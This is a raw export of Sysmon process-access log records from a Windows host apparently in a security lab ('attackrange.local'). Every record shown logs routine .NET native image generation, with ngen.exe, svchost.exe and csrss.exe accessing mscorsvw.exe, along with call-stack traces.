14:57:55.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-A20D-00000000BB01}5664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.764{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-A10D-00000000BB01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.748{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-A10D-00000000BB01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.748{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-A10D-00000000BB01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.561{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-A00D-00000000BB01}2240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.545{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-A00D-00000000BB01}2240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.545{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-A00D-00000000BB01}2240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.498{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-9F0D-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.483{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-9F0D-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.483{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-9F0D-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.436{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-9E0D-00000000BB01}7084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.420{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-9E0D-00000000BB01}7084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.420{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-9E0D-00000000BB01}7084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.373{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-9D0D-00000000BB01}3236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.358{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-9D0D-00000000BB01}3236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.358{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-9D0D-00000000BB01}3236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-9C0D-00000000BB01}2176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.311{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-9C0D-00000000BB01}2176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.311{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-9C0D-00000000BB01}2176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.264{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-9B0D-00000000BB01}5220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.248{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-9B0D-00000000BB01}5220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.248{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-9B0D-00000000BB01}5220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 